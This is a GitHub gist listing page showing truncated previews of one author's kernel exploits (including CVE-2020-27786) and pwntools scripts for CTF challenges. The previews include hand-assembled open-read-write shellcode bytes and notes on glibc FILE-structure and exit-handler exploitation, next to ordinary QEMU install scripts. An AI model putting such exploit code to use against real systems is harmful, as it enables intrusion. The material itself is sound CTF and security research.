
@soez
soez / exp.c
Created September 30, 2023 14:24
Bluefrost challenge - EKOPARTY_2022
/*
*
* Author: @javierprtd
* Date : 28-09-2023
* Kernel: 6.2.0
*
*/
#define _GNU_SOURCE
#include <stdio.h>
@soez
soez / exp.c
Created July 2, 2023 21:23
No CVE for this (https://lkml.org/lkml/2019/12/5/814): it has never been in the official kernel
/*
*
* Author: @javierprtd
* Date : 22-06-2023
* Kernel: 5.10.77
* Bug : https://lkml.org/lkml/2019/12/5/814
* Review: This bug has never been in the official kernel
* Post : https://soez.github.io/posts/no-cve-for-this.-It-has-never-been-in-the-official-kernel
*
*/
@soez
soez / exploit-CVE-2020-27786.c
Created May 24, 2023 23:33
CVE-2020-27786 exploit
/*
*
* Author: @javierprtd
* Date : 21-05-2023
* Kernel: 4.9.220
*
*/
#include <stdio.h>
#include <stdlib.h>
@soez
soez / robots.py
Created October 1, 2022 21:06
Black Hat MEA CTF
from pwn import *
# Target selection flag; presumably switches between a local process and the
# remote service further down in the script (outside this excerpt).
local = False

# Binaries the exploit script reasons about; checksec output is suppressed
# so the run log stays quiet.
binary = ELF("./main", checksec=False)
libc = ELF("./libc-2.27.so", checksec=False)
def menu(n):
    """Pick option *n* on the program's menu.

    Blocks until the global tube ``io`` has delivered the prompt ``"> "``,
    then sends the option number as a line. Returns ``None``.
    """
    # recvuntil + sendline in one call; the received prompt is discarded.
    io.sendlineafter("> ", str(n))
@soez
soez / aarch64_virt_install.sh
Created September 24, 2022 06:56 — forked from yen3/aarch64_virt_install.sh
aarch64 virt-install commands
#!/bin/bash
# NOTE(review): every path below is hard-coded to /home/yen3 — adjust for the host.
# Start from a clean disk: drop any previous image, then allocate a fresh 10G qcow2.
rm -rf /home/yen3/ubuntu.qcow2
qemu-img create -f qcow2 /home/yen3/ubuntu.qcow2 10G
# Remove the previous libvirt domain definition (and its NVRAM file, via --nvram)
# so the domain can be redefined. The script does not use `set -e`, so a missing
# domain only prints an error here and execution continues.
virsh undefine ubuntu1604arm64 --nvram
install_from_localtion() {
virt-install -n ubuntu1604arm64 --memory 1024 --arch aarch64 --vcpus 1 \
--disk /home/yen3/ubuntu.qcow2,device=disk,bus=virtio \
@soez
soez / mips64el-debian-qemu-exact-steps.md
Created September 24, 2022 06:48 — forked from bradfa/mips64el-debian-qemu-exact-steps.md
mips64el Debian QEMU install

Installing Debian Stretch mips64el Using QEMU

We're going to emulate the mips64el "malta" machine and install Debian Stretch using QEMU on an amd64 Debian Buster host.

You will likely need your user to be in the "libvirt" group and to have installed these packages (or a subset of them):

sudo apt install qemu-system-mips virt-manager libguestfs-tools
@soez
soez / Tip
Last active September 13, 2022 18:35
# Glibc 2.35 Ubuntu 22.04
When exit is called, execution passes through here... (addresses shown without ASLR)
0x7ffff7daa390 <__run_exit_handlers>: endbr64
0x7ffff7daa394 <__run_exit_handlers+4>: push r15
0x7ffff7daa396 <__run_exit_handlers+6>: push r14
0x7ffff7daa398 <__run_exit_handlers+8>: push r13
0x7ffff7daa39a <__run_exit_handlers+10>: push r12
0x7ffff7daa39c <__run_exit_handlers+12>: mov r12,rsi
0x7ffff7daa39f <__run_exit_handlers+15>: push rbp
@soez
soez / cache.py
Last active February 14, 2022 09:25
Defcamp-CTF-2022_cache
from pwn import *
# Target selection flag; presumably switches between a local process and the
# remote service further down in the script (outside this excerpt).
local = False

# Binaries the exploit script reasons about; checksec output is suppressed
# so the run log stays quiet.
libc = ELF("./libc.so.6", checksec=False)
binary = ELF("./vuln", checksec=False)
def menu(n):
    """Pick option *n* on the program's menu.

    Blocks until the global tube ``io`` has delivered the prompt
    ``"\nChoice: "``, then sends the option number as a line. Returns ``None``.
    """
    # recvuntil + sendline in one call; the received prompt is discarded.
    io.sendlineafter("\nChoice: ", str(n))
@soez
soez / babyrop.py
Last active February 6, 2022 22:56
babyrop_DiceCTF-2022
from pwn import *
import binascii
# open-read-write file
filename = "flag.txt"
body = "\x5f" # pop rdi
body += "\x80\x77" + chr(len(filename)) + "\x41" # xor byte [rdi + 11], 0x41 ; 11 = len(/etc/passwd)
body += "\x48\x31\xf6" # xor rsi, rsi
body += "\x48\x31\xc0" # xor rax, rax
# -*- coding:utf-8 -*-
from pwn import *
# based on https://dhavalkapil.com/blogs/FILE-Structure-Exploitation/
def pack_file(_flags = 0,
_IO_read_ptr = 0,
_IO_read_end = 0,
_IO_read_base = 0,
_IO_write_base = 0,